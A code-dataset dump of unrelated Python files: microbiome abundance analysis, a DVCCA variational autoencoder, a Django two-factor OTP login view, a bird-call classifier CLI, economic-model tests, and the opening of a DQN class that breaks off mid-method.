    # combine into dataframe, add measure type string and # of sweeps
    summary_data = pd.DataFrame([mean, std, sem])
    measures = pd.DataFrame([['mean'], ['st. dev.'], ['sem']],
                            columns=['Measure'])
    summary_data = pd.concat([measures, summary_data], axis=1)
    # define path for saving file and save it
    summary_path = os.path.join(table_dir, genotype + '_' + cell_id)
    summary_data.to_csv(summary_path + '_summary_data.csv',
                        float_format='%8.4f', index=False)
    ''' Save metadata to file '''
    # add # of sweeps column to metadata
    # NOTE(review): pd.DataFrame(scalar, columns=...) raises ValueError when
    # no index is given; this likely needs pd.DataFrame({'# Sweeps':
    # [len(sweep_data)]}) — confirm against a run of this script.
    n_sweeps = pd.DataFrame(len(sweep_data), columns=['# Sweeps'])
    metadata = pd.concat([metadata, n_sweeps], axis=1)
    # define metapath and save metadata to file
    meta_path = os.path.join(table_dir, genotype + '_' + cell_id)
    metadata.to_csv(meta_path + '_metadata.csv',
                    float_format='%4.1f', index=False, header=True)
'''take the means of raw, filt, and rs and save to file with single row'''
''' Make into autogenerate a jupyter notebook? '''
| StarcoderdataPython |
16483 | <reponame>sverbanic/ps2-npjBM
from .result import Result
import numpy as np
import pandas as pd
class DiffAbunRes(Result):
    """Differential relative-abundance results computed from an OTU table.

    On construction, computes the three pairwise comparisons
    (pre vs skin, post vs skin, pre vs post) via ``diff_rel_abun`` and
    stores them as attributes of the same names.
    """

    def __init__(self, otu_table, transform_pipe=None, percent=False, **kwargs):
        super().__init__()
        self.pre_vs_skin = diff_rel_abun(otu_table, compare='pre_vs_skin', transform_pipe=transform_pipe,
                                         percent=percent, **kwargs)
        self.post_vs_skin = diff_rel_abun(otu_table, compare='post_vs_skin', transform_pipe=transform_pipe,
                                          percent=percent, **kwargs)
        self.pre_vs_post = diff_rel_abun(otu_table, compare='pre_vs_post', transform_pipe=transform_pipe,
                                         percent=percent, **kwargs)

    @classmethod
    def load_default(cls, dataset='filtered', transform_pipe=None, percent=False, data_root=None, **kwargs):
        """Alternate constructor: load the OTU table from a default .biom file.

        The data root is taken from ``data_root`` or, failing that, the
        DATA_PATH environment variable; raises EnvironmentError if neither
        is available.
        """
        from os import environ
        if data_root is None:
            if 'DATA_PATH' not in environ:
                raise EnvironmentError('Please indicate the root to data folder')
            else:
                root = environ['DATA_PATH']
        else:
            root = data_root
        from skin_mb.data import OtuTable
        return cls(otu_table=OtuTable.from_biom(root + 'otu_tables/' + dataset + '.biom'),
                   transform_pipe=transform_pipe, percent=percent, **kwargs)

    def heatmap(self, compare, ax=None, otu_list=None, subject_list=None,
                adjust_patient_id=True, label_mapper=None, z_log=False, **kwargs):
        """Draw a heatmap of one comparison; returns (image, plotted DataFrame).

        ``compare`` selects the comparison via ``self.get_data``; ``otu_list``
        and ``subject_list`` optionally restrict rows and columns.
        """
        dataset = self.get_data(compare)
        if otu_list is None:
            otu_list = dataset.index
        else:
            dataset = dataset.loc[otu_list]
        if subject_list is None:
            subject_list = dataset.columns
        dataset = dataset[subject_list]
        if ax is None:
            import matplotlib.pyplot as plt
            fig = plt.figure(figsize=(len(subject_list)/5, len(otu_list)/5))
            ax = fig.add_subplot(111)
        if adjust_patient_id:
            # assumes columns are integer patient ids offset by 20 — TODO confirm
            id_mapper = {col: col-20 for col in dataset.columns}
            dataset.rename(columns=id_mapper, inplace=True)
        if label_mapper:
            dataset.rename(index=label_mapper, inplace=True)
        # strip figure-level kwargs that the heatmap helper does not accept
        if 'figsize' in kwargs.keys():
            _ = kwargs.pop('figsize')
        if 'gridspec_kw' in kwargs.keys():
            _ = kwargs.pop('gridspec_kw')
        from ..visualizers.Heatmap import heatmap
        from ..visualizers.PlotTools import CMapsDi
        cmap = CMapsDi.BluWhtRed(reverse=True)
        im = heatmap(values=dataset, ax=ax, origin='lower', z_log=z_log, zorder=5, nan_color='#AEAEAE', cmap=cmap, **kwargs)
        ax.set_xlabel('Patient', fontsize=14)
        return im, dataset
def rel_abun(table):
    """Convert counts to relative abundances: scale each column to sum to 1."""
    column_totals = table.sum(axis=0)
    # dividing by a Series aligns on the column labels, normalising per sample
    return table / column_totals
def clr(table, pseudo_count=0.1):
    """Centred log-ratio transform each column, after adding `pseudo_count`."""
    from scipy.stats import gmean

    def _clr_column(column):
        shifted = column + pseudo_count
        return np.log(shifted / gmean(shifted))

    return table.apply(_clr_column, axis=0)
def diff(table, subject_list, postfix1, postfix2, percent=False):
    """Per-subject difference between the two sample columns of each subject.

    For subject s, computes table['<s><postfix1>'] - table['<s><postfix2>'];
    with percent=True the difference is divided by the first column.
    Returns a DataFrame indexed like `table` with one column per subject.
    """
    result = pd.DataFrame(index=table.index, columns=subject_list)
    for sid in subject_list:
        first = table[str(sid) + postfix1]
        second = table[str(sid) + postfix2]
        delta = first - second
        result[sid] = delta / first if percent else delta
    return result
def diff_rel_abun(otu_table, compare='wound_vs_skin', transform_pipe=None, pseudo_count=0.1,
                  percent=False, otu_list=None, subject_list=None):
    """Run a transform pipeline over the OTU count table for one comparison.

    Sample columns are assumed to be named '<2-digit subject id><A|B|C>'
    where A=pre, B=post, C=skin.

    NOTE(review): the default compare='wound_vs_skin' is not one of the
    accepted values below, so calling this without `compare` always raises
    ValueError — confirm intended default.
    """
    if subject_list is None:
        # subject id is the first two characters of each sample name
        subject_list = set([int(sample[:2]) for sample in otu_table.sample_list])
    if otu_list is None:
        otu_list = otu_table.otu_list
    # map the comparison name onto the pair of sample-name postfixes
    if compare.lower() in ['pre_vs_skin']:
        postfix1 = 'A'
        postfix2 = 'C'
    elif compare.lower() in ['pre_vs_post']:
        postfix1 = 'A'
        postfix2 = 'B'
    elif compare.lower() in ['post_vs_skin']:
        postfix1 = 'B'
        postfix2 = 'C'
    else:
        raise ValueError("Compare should be 'pre_vs_skin', 'pre_vs_post', or 'post_vs_skin'")
    if transform_pipe is None:
        transform_pipe = ['rel abun', 'diff']
    from functools import partial
    # named transformation steps applied left-to-right over the table
    transformations = {
        'rel abun': rel_abun,
        'clr': partial(clr, pseudo_count=pseudo_count),
        'diff': partial(diff, subject_list=subject_list,
                        postfix1=postfix1, postfix2=postfix2, percent=percent)
    }
    table = otu_table.count_table.loc[otu_list]
    for transform in transform_pipe:
        table = transformations[transform](table)
    return table
| StarcoderdataPython |
1704449 | <gh_stars>0
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import Normal
from .layers import Encoder, Decoder
from .utils_deep import Optimisation_VAE
import numpy as np
from ..utils.kl_utils import compute_kl, compute_kl_sparse, compute_ll
import pytorch_lightning as pl
from os.path import join
class DVCCA(pl.LightningModule, Optimisation_VAE):
    """Deep Variational Canonical Correlation Analysis (DVCCA).

    With private=True this is DVCCA-private: each view gets an additional
    private encoder whose latent is concatenated with the shared latent
    before decoding. Trained with one Adam optimiser for the shared encoder
    plus one per view-specific decoder.
    """

    def __init__(
            self,
            input_dims,
            z_dim=1,
            hidden_layer_dims=[],
            non_linear=False,
            learning_rate=0.001,
            beta=1,
            threshold=0,
            trainer_dict=None,
            dist='gaussian',
            private=True,
            **kwargs):
        '''
        Initialise the Deep Variational Canonical Correlation Analysis model
        :param input_dims: columns of input data e.g. [M1 , M2] where M1 and M2 are number of the columns for views 1 and 2 respectively
        :param z_dim: number of latent vectors
        :param hidden_layer_dims: dimensions of hidden layers for encoder and decoder networks.
        :param non_linear: non-linearity between hidden layers. If True ReLU is applied between hidden layers of encoder and decoder networks
        :param learning_rate: learning rate of optimisers.
        :param beta: weighting factor for Kullback-Leibler divergence term.
        :param threshold: TODO - Dropout threshold for sparsity constraint on latent representation. If threshold is 0 then there is no sparsity.
        :param private: Label to indicate VCCA or VCCA-private.
        '''
        super().__init__()
        self.save_hyperparameters()
        self.model_type = 'DVCCA'
        self.input_dims = input_dims
        # copy so the caller's list (and the shared [] default) is never mutated
        self.hidden_layer_dims = hidden_layer_dims.copy()
        self.z_dim = z_dim
        self.hidden_layer_dims.append(self.z_dim)
        self.non_linear = non_linear
        self.beta = beta
        self.learning_rate = learning_rate
        self.threshold = threshold
        self.trainer_dict = trainer_dict
        self.dist = dist
        self.variational = True
        if self.threshold != 0:
            self.sparse = True
            self.model_type = 'sparse_VAE'
            self.log_alpha = torch.nn.Parameter(torch.FloatTensor(1, self.z_dim).normal_(0, 0.01))
        else:
            self.log_alpha = None
            self.sparse = False
        if private:
            self.model_type = 'DVCCA_private'
            self.input_dims = input_dims
        self.private = private
        self.n_views = len(input_dims)
        self.__dict__.update(kwargs)
        # shared encoder operates on the first view only
        self.encoder = torch.nn.ModuleList([Encoder(input_dim=self.input_dims[0], hidden_layer_dims=self.hidden_layer_dims, sparse=self.sparse, variational=True)])
        if private:
            self.private_encoders = torch.nn.ModuleList([Encoder(input_dim=input_dim, hidden_layer_dims=self.hidden_layer_dims, sparse=self.sparse, variational=True) for input_dim in self.input_dims])
            # private decoders consume [shared z, private z] concatenated
            self.hidden_layer_dims[-1] = z_dim + z_dim
        self.decoders = torch.nn.ModuleList([Decoder(input_dim=input_dim, hidden_layer_dims=self.hidden_layer_dims, dist=self.dist, variational=True) for input_dim in self.input_dims])

    def configure_optimizers(self):
        """One Adam optimiser for the shared encoder plus one per decoder."""
        # NOTE(review): encoder lr is hard-coded to 0.001 in both branches and
        # the non-private decoders also use 0.001 (not self.learning_rate) —
        # kept as-is for behavioural compatibility; confirm intent.
        if self.private:
            optimizers = [torch.optim.Adam(self.encoder.parameters(), lr=0.001)] + [torch.optim.Adam(list(self.decoders[i].parameters()),
                          lr=self.learning_rate) for i in range(self.n_views)]
        else:
            optimizers = [torch.optim.Adam(self.encoder.parameters(), lr=0.001)] + [torch.optim.Adam(list(self.decoders[i].parameters()),
                          lr=0.001) for i in range(self.n_views)]
        return optimizers

    def encode(self, x):
        """Encode the views; with private latents, returns per-view lists of
        concatenated [shared, private] mu/logvar tensors."""
        mu, logvar = self.encoder[0](x[0])
        if self.private:
            mu_tmp = []
            logvar_tmp = []
            for i in range(self.n_views):
                mu_p, logvar_p = self.private_encoders[i](x[i])
                mu_ = torch.cat((mu, mu_p), 1)
                mu_tmp.append(mu_)
                logvar_ = torch.cat((logvar, logvar_p), 1)
                logvar_tmp.append(logvar_)
            mu = mu_tmp
            logvar = logvar_tmp
        return mu, logvar

    def reparameterise(self, mu, logvar):
        """Sample z = mu + eps * std with the reparameterisation trick."""
        if self.private:
            z = []
            for i in range(self.n_views):
                std = torch.exp(0.5 * logvar[i])
                eps = torch.randn_like(mu[i])
                z.append(mu[i] + eps * std)
        else:
            std = torch.exp(0.5 * logvar)
            eps = torch.randn_like(mu)
            z = mu + eps * std
        return z

    def decode(self, z):
        """Decode the latent(s) back into one reconstruction per view."""
        x_recon = []
        for i in range(self.n_views):
            if self.private:
                x_out = self.decoders[i](z[i])
            else:
                x_out = self.decoders[i](z)
            x_recon.append(x_out)
        return x_recon

    def forward(self, x):
        self.zero_grad()
        mu, logvar = self.encode(x)
        z = self.reparameterise(mu, logvar)
        x_recon = self.decode(z)
        fwd_rtn = {'x_recon': x_recon,
                   'mu': mu,
                   'logvar': logvar}
        return fwd_rtn

    @staticmethod
    def calc_kl(self, mu, logvar):
        '''
        KL divergence term, weighted by beta.
        Implementation from: https://arxiv.org/abs/1312.6114
        '''
        kl = 0
        if self.private:
            for i in range(self.n_views):
                if self.sparse:
                    kl += compute_kl_sparse(mu[i], logvar[i])
                else:
                    kl += compute_kl(mu[i], logvar[i])
        else:
            if self.sparse:
                # BUG FIX: the sparse KL term was computed but its result was
                # discarded (missing "kl +="), so sparse non-private models
                # trained with zero KL regularisation.
                kl += compute_kl_sparse(mu, logvar)
            else:
                kl += compute_kl(mu, logvar)
        return self.beta * kl

    @staticmethod
    def calc_ll(self, x, x_recon):
        """Summed reconstruction log-likelihood term over all views."""
        ll = 0
        for i in range(self.n_views):
            ll += compute_ll(x[i], x_recon[i], dist=self.dist)
        return ll

    def sample_from_normal(self, normal):
        """Deterministic 'sample': return the distribution mean."""
        return normal.loc

    def loss_function(self, x, fwd_rtn):
        """Total loss = beta-weighted KL + reconstruction term."""
        x_recon = fwd_rtn['x_recon']
        mu = fwd_rtn['mu']
        logvar = fwd_rtn['logvar']
        kl = self.calc_kl(self, mu, logvar)
        recon = self.calc_ll(self, x, x_recon)
        total = kl + recon
        losses = {'total': total,
                  'kl': kl,
                  'll': recon}
        return losses

    def training_step(self, batch, batch_idx, optimizer_idx):
        fwd_return = self.forward(batch)
        loss = self.loss_function(batch, fwd_return)
        self.log('train_loss', loss['total'], on_epoch=True, prog_bar=True, logger=True)
        self.log('train_kl_loss', loss['kl'], on_epoch=True, prog_bar=True, logger=True)
        self.log('train_ll_loss', loss['ll'], on_epoch=True, prog_bar=True, logger=True)
        return loss['total']

    def validation_step(self, batch, batch_idx):
        fwd_return = self.forward(batch)
        loss = self.loss_function(batch, fwd_return)
        self.log('val_loss', loss['total'], on_epoch=True, prog_bar=True, logger=True)
        self.log('val_kl_loss', loss['kl'], on_epoch=True, prog_bar=True, logger=True)
        self.log('val_ll_loss', loss['ll'], on_epoch=True, prog_bar=True, logger=True)
        return loss['total']

    def on_train_end(self):
        # self.output_path is expected to arrive via **kwargs — TODO confirm
        self.trainer.save_checkpoint(join(self.output_path, 'model.ckpt'))
1902371 | from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from django_restframework_2fa.serializers import RequestLoginSerializer
from twilio.base.exceptions import TwilioRestException
User = get_user_model()
class Login2FARequestOTPView(APIView):
    '''
    This view is used to request an OTP on the user's mobile number for verification.
    It uses basic authentication instead of JWTAuthentication.
    '''
    def post(self, request, format=None):
        """Validate email/password and ask the serializer to send an OTP."""
        serialized_data = RequestLoginSerializer(data=request.data)
        serialized_data.is_valid(raise_exception=True)
        # look up the account by email; 400 rather than 404 to avoid leaking
        # which addresses exist beyond this generic message
        try:
            user_instance = User.objects.get(email=serialized_data.validated_data['email'])
        except User.DoesNotExist:
            return Response({'message':'Account with the provided credentials does not exist.'}, status.HTTP_400_BAD_REQUEST)
        if not user_instance.check_password(serialized_data.validated_data['password']):
            return Response({'message':'Invalid credentials.'}, status.HTTP_401_UNAUTHORIZED)
        # delegate OTP dispatch to the serializer; presumably this raises
        # TwilioRestException on delivery failure (caught by the broad
        # Exception handler below) — TODO confirm
        try:
            response = serialized_data.get_response(user_instance)
        except ValueError as e:
            return Response({"message": str(e)}, status.HTTP_400_BAD_REQUEST)
        except Exception as e:
            return Response({"message": str(e)}, status.HTTP_503_SERVICE_UNAVAILABLE)
        return Response(response, status=status.HTTP_200_OK)
5087461 | <gh_stars>1-10
from __future__ import print_function
import logging
import os
import sys
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from collections.abc import Iterable
from pprint import pformat
import birdvoxclassify
from birdvoxclassify.core import DEFAULT_MODEL_NAME
from birdvoxclassify.birdvoxclassify_exceptions import BirdVoxClassifyError
# The following line circumvent issue #1715 in xgboost
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
def get_file_list(input_list):
    """Expand an iterable of file/directory paths into a flat list of files.

    File entries are absolutised; directory entries contribute each regular
    file directly inside them (non-recursive). Raises BirdVoxClassifyError
    for non-iterable/string input or for paths that do not exist.
    """
    if isinstance(input_list, str) or not isinstance(input_list, Iterable):
        raise BirdVoxClassifyError('input_list must be a non-string iterable')

    collected = []
    for entry in input_list:
        if os.path.isfile(entry):
            collected.append(os.path.abspath(entry))
        elif os.path.isdir(entry):
            candidates = (os.path.join(entry, name) for name in os.listdir(entry))
            collected.extend(path for path in candidates if os.path.isfile(path))
        else:
            raise BirdVoxClassifyError(
                'Could not find input at path {}'.format(entry))
    return collected
def run(inputs, output_dir=None, output_summary_path=None,
        model_name=DEFAULT_MODEL_NAME, batch_size=512,
        select_best_candidates=False, hierarchical_consistency=False,
        suffix="", logger_level=logging.INFO):
    """Runs classification model on input audio clips.

    `inputs` may be a single path (str) or an iterable of file/directory
    paths expanded via get_file_list. Exits the process with status -1 when
    no files are found; otherwise delegates to birdvoxclassify.process_file
    and logs the returned output.
    """
    # Set logger level.
    logging.getLogger().setLevel(logger_level)
    if isinstance(inputs, str):
        file_list = [inputs]
    elif isinstance(inputs, Iterable):
        file_list = get_file_list(inputs)
    else:
        raise BirdVoxClassifyError('Invalid input: {}'.format(str(inputs)))
    if len(file_list) == 0:
        info_msg = 'birdvoxclassify: No WAV files found in {}. Aborting.'
        logging.info(info_msg.format(str(inputs)))
        sys.exit(-1)
    # Print header
    if output_dir:
        logging.info("birdvoxclassify: Output directory = " + output_dir)
    if not suffix == "":
        logging.info("birdvoxclassify: Suffix string = " + suffix)
    # Process all files in the arguments
    output = birdvoxclassify.process_file(
        file_list,
        output_dir=output_dir,
        output_summary_path=output_summary_path,
        model_name=model_name,
        batch_size=batch_size,
        select_best_candidates=select_best_candidates,
        hierarchical_consistency=hierarchical_consistency,
        suffix=suffix,
        logger_level=logger_level)
    logging.info('birdvoxclassify: Printing output.')
    logging.info(pformat(output))
    logging.info('birdvoxclassify: Done.')
def parse_args(args):
    """Parses CLI arguments.

    Builds the argparse parser for the birdvoxclassify command line and
    returns the parsed namespace. Raises BirdVoxClassifyError when the
    mutually exclusive --quiet and --verbose flags are both given.
    """
    parser = ArgumentParser(
        sys.argv[0],
        description=main.__doc__,
        formatter_class=RawDescriptionHelpFormatter)
    parser.add_argument(
        'inputs', nargs='*',
        help='Path or paths to files to process, or path to '
             'a directory of files to process.')
    parser.add_argument(
        '--output-dir', '-o', default=None, dest='output_dir',
        help='Directory to save individual output file(s)')
    parser.add_argument(
        '--output-summary-path', '-O', default=None, dest='output_summary_path',
        help='Directory to save individual output file(s)')
    parser.add_argument(
        '--select-best-candidates', '-B', action='store_true',
        dest='select_best_candidates',
        help='Select best candidates instead of '
             'enumerating all classes in output.')
    parser.add_argument(
        '--no-hierarchical-consistency', '-N', action='store_false',
        dest='hierarchical_consistency',
        help='Do not apply hierarchical consistency when selecting best candidates.')
    parser.add_argument(
        '--model-name', '-c', default=DEFAULT_MODEL_NAME,
        dest='model_name',
        help='Name of bird species classifier model to be used.')
    parser.add_argument(
        '--batch-size', '-b', type=positive_int, default=512, dest='batch_size',
        help='Input batch size used by classifier model.'
    )
    parser.add_argument(
        '--suffix', '-s', default="", dest='suffix',
        help='String to append to the output filenames.'
             'The default value is the empty string.')
    parser.add_argument(
        '--quiet', '-q', action='store_true', dest='quiet',
        help='Print less messages on screen.')
    parser.add_argument(
        '--verbose', '-v', action='store_true', dest='verbose',
        help='Print timestamps of classified events.')
    parser.add_argument(
        '--version', '-V', action='store_true', dest='version',
        help='Print version number.')
    args = parser.parse_args(args)
    # argparse cannot express this exclusivity across two store_true flags
    # with custom error type, so it is checked here
    if args.quiet and args.verbose:
        raise BirdVoxClassifyError(
            'Command-line flags --quiet (-q) and --verbose (-v) '
            'are mutually exclusive.')
    return args
def main():
    """
    Classifies nocturnal flight calls from audio by means of the
    BirdVoxClassify deep learning model.
    """
    args = parse_args(sys.argv[1:])
    # --version short-circuits everything else
    if args.version:
        print(birdvoxclassify.version.version)
        return
    # map the verbosity flags onto numeric logging levels
    # (30=WARNING-ish quiet, 25=default, 20=INFO verbose)
    if args.quiet:
        logger_level = 30
    elif args.verbose:
        logger_level = 20
    else:
        logger_level = 25
    run(args.inputs,
        output_dir=args.output_dir,
        output_summary_path=args.output_summary_path,
        model_name=args.model_name,
        batch_size=args.batch_size,
        select_best_candidates=args.select_best_candidates,
        hierarchical_consistency=args.hierarchical_consistency,
        suffix=args.suffix,
        logger_level=logger_level)
def positive_int(value):
    """An argparse-like method for accepting only positive number"""
    try:
        parsed = int(value)
    except (ValueError, TypeError) as exc:
        raise BirdVoxClassifyError(
            'Expected a positive int, error message: {}'.format(exc))
    if parsed <= 0:
        raise BirdVoxClassifyError('Expected a positive integer')
    return parsed
| StarcoderdataPython |
11235240 | from django.shortcuts import render, get_object_or_404
from django.http import JsonResponse
from .models import ArchivePost
def archive_post_year_list(request):
    """Return JSON listing the 'year' field of every ArchivePost."""
    year_list = ArchivePost.objects.all()
    data = {"results": list(year_list.values("year"))}
    return JsonResponse(data)
def archive_post_year_detail(request, pk):
    """Return JSON with the posts whose year equals `pk` (may be empty)."""
    year_posts = ArchivePost.objects.filter(year=pk)
    data = {"results": list(year_posts.values("title", "year", "post_content", "post_summary", "post_image_alt_text"))}
    return JsonResponse(data)
3242274 | <reponame>radovankavicky/pymaclab
import pymaclab as pm
import pymaclab.modfiles.models as models
# Build the RBC model once at import time; the tests below mutate this
# shared instance in sequence.
rbc = pm.newMOD(models.stable.rbc1_num,mesg=False,ncpus='auto')
# Try to update all of the wrapped objects and test if this has worked
# Do for paramdic, set_item
def test_paramdic_item():
    """__setitem__ on the updater paramdic must propagate to the wrapped
    object and to the model's own paramdic."""
    eta_key = 'eta'
    eta_old = 2.0
    eta_new = 5.0
    rbc.updaters.paramdic[eta_key] = eta_new
    # Did it work?
    assert rbc.updaters.paramdic.wrapobj[eta_key] == eta_new
    assert rbc.updaters.paramdic[eta_key] == eta_new
    assert rbc.paramdic[eta_key] == eta_new
# Do for paramdic, update
def test_paramdic_update():
    """dict.update() on the updater paramdic must propagate all keys to the
    wrapped object and to the model's own paramdic."""
    eta_key = 'eta'
    eta_old = 2.0
    eta_new = 5.0
    rho_key = 'rho'
    rho_old = 0.36
    rho_new = 0.35
    tmp_dic = {}
    tmp_dic[eta_key] = eta_new
    tmp_dic[rho_key] = rho_new
    rbc.updaters.paramdic.update(tmp_dic)
    # Did it work?
    assert rbc.updaters.paramdic.wrapobj[eta_key] == eta_new
    assert rbc.updaters.paramdic[eta_key] == eta_new
    assert rbc.paramdic[eta_key] == eta_new
    assert rbc.updaters.paramdic.wrapobj[rho_key] == rho_new
    assert rbc.updaters.paramdic[rho_key] == rho_new
    assert rbc.paramdic[rho_key] == rho_new
# Do for nlsubsdic, set_item
def test_nlsubsdic_item():
    """__setitem__ on the updater nlsubsdic must propagate to the wrapped
    object and to the model's own nlsubsdic."""
    U_key = '@U(t)'
    U_old = 'c(t)**(1-eta)/(1-eta)'
    U_new = 'c(t)**(1-eta*1.01)/(1-eta*1.01)'
    rbc.updaters.nlsubsdic[U_key] = U_new
    # Did it work?
    assert rbc.updaters.nlsubsdic.wrapobj[U_key] == U_new
    assert rbc.updaters.nlsubsdic[U_key] == U_new
    assert rbc.nlsubsdic[U_key] == U_new
# Do for nlsubsdic, update
def test_nlsubsdic_update():
    """dict.update() on the updater nlsubsdic must propagate all keys to the
    wrapped object and to the model's own nlsubsdic."""
    U_key = '@U(t)'
    U_old = 'c(t)**(1-eta)/(1-eta)'
    U_new = 'c(t)**(1-eta*1.01)/(1-eta*1.01)'
    F_key = '@F(t)'
    F_old = 'z(t)*k(t-1)**rho'
    F_new = 'z(t)*k(t-1)**rho*1.01'
    tmp_dic = {}
    tmp_dic[U_key] = U_new
    tmp_dic[F_key] = F_new
    rbc.updaters.nlsubsdic.update(tmp_dic)
    # Did it work?
    assert rbc.updaters.nlsubsdic.wrapobj[U_key] == U_new
    assert rbc.updaters.nlsubsdic[U_key] == U_new
    assert rbc.nlsubsdic[U_key] == U_new
    assert rbc.updaters.nlsubsdic.wrapobj[F_key] == F_new
    assert rbc.updaters.nlsubsdic[F_key] == F_new
    assert rbc.nlsubsdic[F_key] == F_new
# Do for vardic, set_item
def test_vardic_item():
    """Nested item assignment on the updater vardic must propagate to the
    wrapped object and to the model's own vardic."""
    var_key = ['c(t)','consumption']
    indexo = rbc.vardic['con']['var'].index(var_key)
    var_old = 'bk'
    var_new = 'cf'
    rbc.updaters.vardic['con']['mod'][indexo][1] = var_new
    # Did it work?
    assert rbc.updaters.vardic.wrapobj['con']['mod'][indexo][1] == var_new
    assert rbc.updaters.vardic['con']['mod'][indexo][1] == var_new
    assert rbc.vardic['con']['mod'][indexo][1] == var_new
| StarcoderdataPython |
46817 | <gh_stars>1-10
class Recommendation:
    """A recommended article with optional Wikidata enrichment fields.

    All fields except `title` start as None and are filled in later (e.g.
    via incorporate_wikidata_item).
    """

    def __init__(self, title):
        self.title = title
        self.wikidata_id = None
        self.rank = None
        self.pageviews = None
        self.url = None
        self.sitelink_count = None

    def to_dict(self):
        """Return the recommendation's fields as a plain dict."""
        return dict(title=self.title,
                    wikidata_id=self.wikidata_id,
                    rank=self.rank,
                    pageviews=self.pageviews,
                    url=self.url,
                    sitelink_count=self.sitelink_count)

    # NOTE: defining __dict__ as a method shadows the normal instance-dict
    # descriptor (breaks vars(obj)). Kept for backward compatibility with
    # callers that invoke rec.__dict__(); new code should use to_dict().
    def __dict__(self):
        return self.to_dict()

    def incorporate_wikidata_item(self, item):
        """Copy identifying fields (id, url, sitelink count) from a Wikidata item."""
        self.wikidata_id = item.id
        self.url = item.url
        self.sitelink_count = item.sitelink_count
3444930 | <reponame>MorvanZhou/my_research<filename>self_driving_research_DQN/learning_methods.py
# View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
import pandas as pd
import numpy as np
from multiprocessing import Process, Queue, cpu_count
class DQNNaive:
"""
Deep Q-Networks Recalled Neural Networks.
------------------------------
1, Take action at according to epsilon-greedy policy
2, Store transition (st, at, rt, st+1) in replay memory D
3, Sample random mini-batch of transitions (s, a, r, s') from D
4, Compute Q-learning targets with regard to old, fixed parameters theta
5, Input X = (action, features),
6, output y_predict= Q(s, a, theta),
y = R + gamma * max_a[Q(s', a, theta)]
Use activation function to different layers:
Non_last layer: Rectified Linear Unit (ReLU) OR SoftPlus
Last layer: linear activation function
------------------------------
Methods used in environment:
env.update_environment(state, action_value)
env.get_features(state, action_value)
"""
    def __init__(self, all_actions=None, epsilon=0.9, epsilon_decay_rate=0.99,
                 alpha=0.01, gamma=0.99, search_time=3000, min_alpha=0.001,
                 momentum=0.95, squ_grad_momentum=0.999, min_squ_grad=0.001, alpha_method='RMSProp', regularization=None,
                 n_hidden_layers=1, n_hidden_units=None, activation_function='ReLU', memory_capacity=30000,
                 batch_size=50, rec_his_rate=0.2, target_theta_update_frequency=1000, n_jobs=-1,
                 replay_start_size=2000):
        """
        Parameters
        ----------
        all_actions:
            all action values, is an array, shape of (n_actions, ).
        epsilon:
            epsilon greedy policy.
        epsilon_decay_rate:
            decay rate accompany with time steps.
        alpha:
            initial learning rate.
        gamma:
            discount factor in Q-learning update.
        search_time:
            For Annealing learning rate.
        min_alpha:
            The minimum learning rate value.
        momentum:
            Gradient momentum used by Adam.
        squ_grad_momentum:
            parameter for RMSProp, squared gradient (denominator) momentum.
        min_squ_grad:
            parameter for RMSProp, constant added to the squared gradient in the denominator.
        alpha_method:
            What alpha decay method has been chosen.
        regularization:
            regularization term of Neural Networks.
        n_hidden_layers:
            Number of hidden layers.
        n_hidden_units:
            Number of hidden neurons.
        activation_function:
            The activation function used in Neural Networks.
        memory_capacity:
            Number of transitions storing in memory.
        batch_size:
            mini-batch size to update gradient for each stochastic gradient descent (SGD).
        rec_his_rate:
            The ratio of most recent transitions in sampled mini-batch.
        target_theta_update_frequency:
            The frequency (measured in the number of parameter updates) with which the target network is updated.
        n_jobs:
            Number of CPU used to calculate gradient update.
        replay_start_size:
            Start replay and learning at this size.
        Returns
        -------
        """
        try:
            # Index the action values by their string labels so that action
            # labels chosen by the policy can be mapped back to values.
            actions_value = all_actions
            actions_label = [str(value) for value in actions_value]
            self.actions = pd.Series(data=actions_value, index=actions_label)
        except TypeError:
            # all_actions was None (or not iterable): keep it as given.
            self.actions = all_actions
        self.epsilon = epsilon
        self.alpha = alpha
        self.alpha_method = alpha_method  # 'RMSProp', or 'Annealing'
        # '--' marks hyper-parameters that the chosen method does not use.
        self.squ_grad_momentum = '--' if self.alpha_method in ['Annealing', 'Momentum'] else squ_grad_momentum
        # The RMSProp denominator must stay >= alpha^2, otherwise the
        # effective learning rate could exceed alpha on the first steps.
        if min_squ_grad < alpha**2-0.001 and self.alpha_method != 'Annealing':
            raise ValueError('min_squ_grad need greater than alpha^2')
        self.min_squ_grad = min_squ_grad
        self.learning_time = 0
        self.gamma = gamma
        self.init_alpha = alpha
        self.min_alpha = min_alpha
        self.search_time = search_time
        self.lambda_reg = regularization
        self.enable_alpha_decrease = True
        self.learning_method_name = 'DQN_RNNs'
        self.activation_function = activation_function
        if self.activation_function not in ['ReLU', 'SoftPlus']:
            raise NameError("Activation function must in: 'ReLU', 'SoftPlus'")
        # Total layer count = hidden layers + input layer + output layer.
        self.n_layers = n_hidden_layers + 2
        self.n_hidden_units = n_hidden_units
        # Let W be vectors with one component for each possible feature.
        # Weights are lazily initialised on the first forward pass
        # (see get_all_q_and_all_features); None until then.
        self.fixed_Thetas = None  # np.array([1,2,3,4,]).T
        self.Thetas = None
        self.swap_Theta_counting = 0
        self.target_theta_update_frequency = target_theta_update_frequency
        self.memory_capacity = memory_capacity
        self.batch_size = batch_size
        self.n_jobs = n_jobs
        # Replay memory: one row per stored transition (circular once full).
        self.memory = pd.DataFrame()
        self.memory_index = 0
        self.cost_his = pd.Series()
        self.max_action_value_his = pd.Series()
        self.momentum = momentum if self.alpha_method in ['Adam', 'RMSProp_DQN', 'Momentum'] else '--'
        self.rec_his_rate = rec_his_rate
        self.epsilon_decay_rate = epsilon_decay_rate
        self.replay_start_size = replay_start_size
def take_and_return_action(self, env, state):
"""
Execute in environment, for each object
return chosen action_label
"""
all_q, all_features = self.get_all_q_and_all_features(env, state)
action_label = self.choose_action(all_q)
self.update_environment(state, action_label, env)
return action_label
    def store_transition(self, env, state, action_label, reward, next_state, terminate):
        """Store one transition (S, A, R, S', done) in the replay memory.

        Features are extracted once here so that replay never has to touch
        the environment again.  The memory grows until ``memory_capacity``
